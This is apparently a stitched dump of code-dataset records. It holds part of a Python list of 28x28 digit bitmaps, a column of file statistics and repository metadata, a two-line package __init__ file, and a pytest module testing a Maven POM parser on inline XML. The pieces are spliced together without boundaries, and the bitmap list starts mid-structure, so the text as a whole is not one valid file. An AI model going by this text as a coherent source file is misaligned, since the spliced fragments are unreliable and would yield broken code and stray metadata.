     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,7,4,4,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,7,4,2,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,4,4,2,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,2,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,2,4,2,0,0,0,2,4,7,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,4,4,4,4,2,0,0,0,2,4,7,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,7,4,4,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
    # Digit 5.
    [[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,4,4,4,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,2,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,2,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,4,4,7,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,7,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,4,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,2,4,4,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,4,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
    # Digit 6.
    [[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,7,4,4,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,2,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
    # Digit 7.
    [[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,4,4,4,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,2,4,2,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,4,4,7,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,7,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
    # Digit 8.
    [[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]],
    # Digit 9.
    [[9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,4,4,2,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,4,4,7,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,4,0,0,0,4,9,4,0,0,0,4,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,7,4,2,0,2,4,2,0,2,4,7,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,4,0,0,0,0,0,4,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,7,4,4,4,4,4,7,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],
     [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9]]
]
| 53.61745
| 90
| 0.523345
| 8,745
| 23,967
| 1.42024
| 0.035334
| 1.026248
| 1.502415
| 1.953945
| 0.690258
| 0.676892
| 0.673672
| 0.654911
| 0.654911
| 0.649758
| 0
| 0.369878
| 0.102975
| 23,967
| 446
| 91
| 53.737668
| 0.207824
| 0.166354
| 0
| 0.812308
| 0
| 0
| 0.007771
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015385
| false
| 0
| 0.015385
| 0
| 0.046154
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d6668d7f125474f14fbaa6f021b6b94ba0fd7b4b
| 60
|
py
|
Python
|
mylib/__init__.py
|
913982779/eight_queens
|
5bbd6a5ee371843e6a22a063d8b8a1be4a885dbc
|
[
"MIT"
] | 1
|
2021-11-03T11:58:19.000Z
|
2021-11-03T11:58:19.000Z
|
mylib/__init__.py
|
913982779/eight_queens
|
5bbd6a5ee371843e6a22a063d8b8a1be4a885dbc
|
[
"MIT"
] | null | null | null |
mylib/__init__.py
|
913982779/eight_queens
|
5bbd6a5ee371843e6a22a063d8b8a1be4a885dbc
|
[
"MIT"
] | null | null | null |
from mylib import queens_lib
from mylib import screen_design
| 30
| 31
| 0.883333
| 10
| 60
| 5.1
| 0.7
| 0.352941
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116667
| 60
| 2
| 31
| 30
| 0.962264
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d6d2c020765c006c1a28e73f24013127d2d621c9
| 22,742
|
py
|
Python
|
test/platforms/jvm/test_maven_pom.py
|
toptal/license-cop
|
84f3dbf7b3632d761e423b182ce0d9927b885f41
|
[
"MIT"
] | 24
|
2017-11-21T18:30:19.000Z
|
2021-11-08T10:52:48.000Z
|
test/platforms/jvm/test_maven_pom.py
|
toptal/license-cop
|
84f3dbf7b3632d761e423b182ce0d9927b885f41
|
[
"MIT"
] | 27
|
2017-11-22T15:50:56.000Z
|
2021-09-30T09:03:21.000Z
|
test/platforms/jvm/test_maven_pom.py
|
toptal/license-cop
|
84f3dbf7b3632d761e423b182ce0d9927b885f41
|
[
"MIT"
] | 5
|
2017-11-21T14:08:21.000Z
|
2021-04-07T19:30:09.000Z
|
import pytest
from textwrap import dedent
from test import *
from app.platforms.jvm.maven_pom import MavenPom
from app.platforms.jvm.maven_dependency import MavenDependency
from app.platforms.jvm.package_name import JvmPackageName
from app.platforms.jvm.maven_package_registry import MavenPackageRegistry
from app.dependency import DependencyKind
@pytest.fixture
def registry():
    """Fresh MavenPackageRegistry for each test in this module."""
    # NOTE(review): HTTP compression is disabled here — presumably so any
    # recorded/stubbed HTTP responses stay byte-stable; confirm against the
    # test HTTP-fixture setup.
    return MavenPackageRegistry(http_compression=False)
def test_parse_scalar_xml(registry):
    """Parsing a complete POM with scalar fields exposes coordinates, licenses and URLs."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<modelVersion>4.0.0</modelVersion>
<groupId>org.spire-math</groupId>
<artifactId>kind-projector_2.10</artifactId>
<packaging>jar</packaging>
<description>kind-projector</description>
<url>http://github.com/non/kind-projector</url>
<version>0.9.4</version>
<licenses>
<license>
<name>MIT</name>
<url>http://opensource.org/licenses/MIT</url>
<distribution>repo</distribution>
</license>
<license>
<name>GPLv3</name>
<url>http://opensource.org/licenses/GPLv3</url>
<distribution>repo</distribution>
</license>
</licenses>
<name>kind-projector</name>
<organization>
<name>org.spire-math</name>
<url>http://github.com/non/kind-projector</url>
</organization>
<scm>
<url>git@github.com:non/kind-projector.git</url>
<connection>scm:git:git@github.com:non/kind-projector.git</connection>
</scm>
<developers>
<developer>
<id>d_m</id>
<name>Erik Osheim</name>
<url>http://github.com/non/</url>
</developer>
</developers>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    # Coordinates come straight from the top-level elements.
    assert pom.group_id == 'org.spire-math'
    assert pom.artifact_id == 'kind-projector_2.10'
    assert pom.version == '0.9.4'
    # No <parent>, <properties> or <dependencies> in this POM.
    assert pom.parent is None
    assert pom.properties == {}
    assert pom.dependencies == []
    # Both <license> names are collected; order is not asserted.
    assert set(pom.licenses) == set(['MIT', 'GPLv3'])
    # urls gathers the project <url> and the <scm><url> (not developer/license urls).
    assert pom.urls == set([
        'http://github.com/non/kind-projector',
        'git@github.com:non/kind-projector.git'
    ])
def test_parse_xml_with_dependencies(registry):
    """Dependencies are split into runtime vs. development (test-scoped) kinds."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<groupId>org.spire-math</groupId>
<artifactId>kind-projector_2.10</artifactId>
<version>0.9.4</version>
<dependencies>
<dependency>
<groupId>org.scala-lang</groupId>
<artifactId>scala-compiler</artifactId>
<version>2.10.6</version>
</dependency>
<dependency>
<groupId>org.scala-lang</groupId>
<artifactId>scala-library</artifactId>
<version>2.10.6</version>
</dependency>
<dependency>
<groupId>org.scalamacros</groupId>
<artifactId>quasiquotes_2.10</artifactId>
<version>2.1.0</version>
</dependency>
<dependency>
<groupId>com.novocode</groupId>
<artifactId>junit-interface</artifactId>
<version>0.11</version>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.ensime</groupId>
<artifactId>pcplod_2.10</artifactId>
<version>1.2.1</version>
<scope>test</scope>
</dependency>
</dependencies>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    # Unscoped dependencies are classified as runtime...
    assert set(pom.filter_dependencies(DependencyKind.RUNTIME)) == set([
        MavenDependency('org.scala-lang', 'scala-compiler'),
        MavenDependency('org.scala-lang', 'scala-library'),
        MavenDependency('org.scalamacros', 'quasiquotes_2.10')
    ])
    # ...while <scope>test</scope> entries are development dependencies.
    assert set(pom.filter_dependencies(DependencyKind.DEVELOPMENT)) == set([
        MavenDependency('com.novocode', 'junit-interface', 'test'),
        MavenDependency('org.ensime', 'pcplod_2.10', 'test')
    ])
def test_parse_xml_with_only_one_dependency(registry):
    """A single <dependency> still yields a one-element list, not a scalar."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<dependencies>
<dependency>
<groupId>org.scala-lang</groupId>
<artifactId>scala-compiler</artifactId>
<version>2.10.6</version>
</dependency>
</dependencies>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.dependencies == [
        MavenDependency('org.scala-lang', 'scala-compiler')
    ]


def test_parse_xml_with_empty_dependencies_block(registry):
    """An empty <dependencies> element produces an empty list."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<dependencies>
</dependencies>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.dependencies == []
@VCR.use_cassette('maven_pom_parse_xml_with_parent.yaml')
def test_parse_xml_with_parent(registry):
    """The <parent> POM is resolved and exposed; HTTP traffic is replayed from a VCR cassette."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<groupId>org.apache.ws.commons.axiom</groupId>
<artifactId>axiom-parent</artifactId>
<version>1.2.9</version>
<parent>
<groupId>org.apache</groupId>
<artifactId>apache</artifactId>
<version>7</version>
</parent>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.parent.group_id == 'org.apache'
    assert pom.parent.artifact_id == 'apache'
    assert pom.parent.version == '7'
    # The resolved parent has no parent of its own.
    assert pom.parent.parent is None


@VCR.use_cassette('maven_pom_parse_xml_with_parent_and_grandparent.yaml')
def test_parse_xml_with_parent_and_grandparent(registry):
    """Parent resolution is recursive: the parent's own <parent> is resolved too."""
    xml = dedent('''\
<?xml version='1.0' encoding='UTF-8'?>
<project
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://maven.apache.org/POM/4.0.0">
<groupId>org.apache.cxf</groupId>
<artifactId>apache-cxf</artifactId>
<version>2.2.5</version>
<parent>
<groupId>org.apache.cxf</groupId>
<artifactId>cxf-parent</artifactId>
<version>2.2.5</version>
<relativePath>../parent</relativePath>
</parent>
</project>
''')
    pom = MavenPom.parse(xml, registry)
    assert pom.parent.group_id == 'org.apache.cxf'
    assert pom.parent.artifact_id == 'cxf-parent'
